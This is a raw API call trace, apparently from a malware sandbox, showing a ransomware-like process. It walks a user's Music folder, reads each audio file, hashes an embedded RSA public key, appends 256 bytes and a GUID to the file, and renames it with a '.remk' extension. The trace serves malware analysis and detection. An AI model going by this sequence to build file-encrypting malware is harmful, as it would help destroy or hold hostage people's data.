lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x2381, lpOverlapped=0x0) returned 1 [0235.419] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0235.419] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.419] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.419] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0235.420] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0235.420] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0235.420] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0235.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0235.420] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0235.420] GetLastError () returned 0x0 [0235.420] CryptDestroyHash (hHash=0x31de170) returned 1 [0235.420] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0235.420] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0235.420] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0235.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.420] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0235.420] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0235.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0235.421] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x2381, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.421] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0235.421] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0235.421] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0235.421] CloseHandle (hObject=0x640) returned 1 [0235.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0235.447] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8d0) returned 0x37bd408 [0235.447] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0235.447] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\-wYl9Wxaf_FQLu8dRQB5\\8zc5gaDVdZR.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\-wyl9wxaf_fqlu8drqb5\\8zc5gadvdzr.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\-wYl9Wxaf_FQLu8dRQB5\\8zc5gaDVdZR.wav.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\-wyl9wxaf_fqlu8drqb5\\8zc5gadvdzr.wav.remk")) returned 1 [0235.448] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0235.448] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.448] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0235.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0235.449] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8878ed10, ftCreationTime.dwHighDateTime=0x1d5e4a9, ftLastAccessTime.dwLowDateTime=0xdbb0b020, ftLastAccessTime.dwHighDateTime=0x1d5dc03, ftLastWriteTime.dwLowDateTime=0xdbb0b020, ftLastWriteTime.dwHighDateTime=0x1d5dc03, nFileSizeHigh=0x0, nFileSizeLow=0x61ab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BLoYkmvVlNGLNVl9j.m4a", cAlternateFileName="BLOYKM~1.M4A")) returned 1 [0235.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xee) returned 0x31a4298 [0235.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.449] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\-wYl9Wxaf_FQLu8dRQB5\\BLoYkmvVlNGLNVl9j.m4a") returned=".m4a" [0235.449] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\-wYl9Wxaf_FQLu8dRQB5\\BLoYkmvVlNGLNVl9j.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\-wyl9wxaf_fqlu8drqb5\\bloykmvvlnglnvl9j.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0235.450] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=25003) returned 1 [0235.450] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0235.453] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x6185, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.453] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0235.454] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0235.454] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.454] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0235.454] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x61ab, lpOverlapped=0x0) returned 1 [0235.455] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.455] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0235.455] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.455] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.455] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0235.456] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0235.456] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0235.456] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0235.456] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0235.456] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0235.456] GetLastError () returned 0x0 [0235.457] CryptDestroyHash (hHash=0x31de170) returned 1 [0235.457] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0235.457] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0235.457] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0235.457] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0235.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.457] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0235.457] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0235.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x61b0) returned 0x37c6278 [0235.457] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0235.457] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0235.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0235.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0235.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0235.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325ccc8 [0235.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eeac0 [0235.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325cd10 [0235.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eeaa8 [0235.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eea90 [0235.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc420 [0235.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc438 [0235.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0235.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0235.458] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0235.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0235.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eea90 | out: hHeap=0x630000) returned 1 [0235.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc438 | out: hHeap=0x630000) returned 1 [0235.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc420 | out: hHeap=0x630000) returned 1 [0235.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0235.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eea90 [0235.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0235.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc420 [0235.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0235.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc438 [0235.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0235.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0235.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0235.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0235.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0235.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0235.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0235.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0235.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0235.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc420 | out: hHeap=0x630000) returned 1 [0235.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0235.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc438 | out: hHeap=0x630000) returned 1 [0235.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0235.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0235.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eea90 | out: hHeap=0x630000) returned 1 [0235.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0235.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0235.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0235.459] GetCurrentThreadId () returned 0x314 [0235.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0235.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c4710 [0235.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0235.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0235.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0235.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0235.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0235.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0235.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.459] GetCurrentThreadId () returned 0x314 [0235.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.460] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0235.460] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.460] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0235.460] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0235.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0235.460] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0235.460] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x61ab, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.460] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0235.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0235.461] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0235.461] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0235.461] CloseHandle (hObject=0x640) returned 1 [0235.464] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\-wYl9Wxaf_FQLu8dRQB5\\BLoYkmvVlNGLNVl9j.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\-wyl9wxaf_fqlu8drqb5\\bloykmvvlnglnvl9j.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\-wYl9Wxaf_FQLu8dRQB5\\BLoYkmvVlNGLNVl9j.m4a.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\-wyl9wxaf_fqlu8drqb5\\bloykmvvlnglnvl9j.m4a.remk")) returned 1 [0235.465] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0235.465] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.465] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0235.467] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0235.467] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf86c3460, ftCreationTime.dwHighDateTime=0x1d5e2b0, ftLastAccessTime.dwLowDateTime=0xf47221d0, ftLastAccessTime.dwHighDateTime=0x1d5daf9, ftLastWriteTime.dwLowDateTime=0xf47221d0, ftLastWriteTime.dwHighDateTime=0x1d5daf9, nFileSizeHigh=0x0, nFileSizeLow=0x1008, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Hh6wUmsTzjoH.wav", cAlternateFileName="HH6WUM~1.WAV")) returned 1 [0235.467] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\-wYl9Wxaf_FQLu8dRQB5\\Hh6wUmsTzjoH.wav") returned=".wav" [0235.467] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\-wYl9Wxaf_FQLu8dRQB5\\Hh6wUmsTzjoH.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\-wyl9wxaf_fqlu8drqb5\\hh6wumstzjoh.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0235.467] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=4104) returned 1 [0235.467] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0235.470] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xfe2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.470] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0235.472] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x1008, lpOverlapped=0x0) returned 1 [0235.472] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 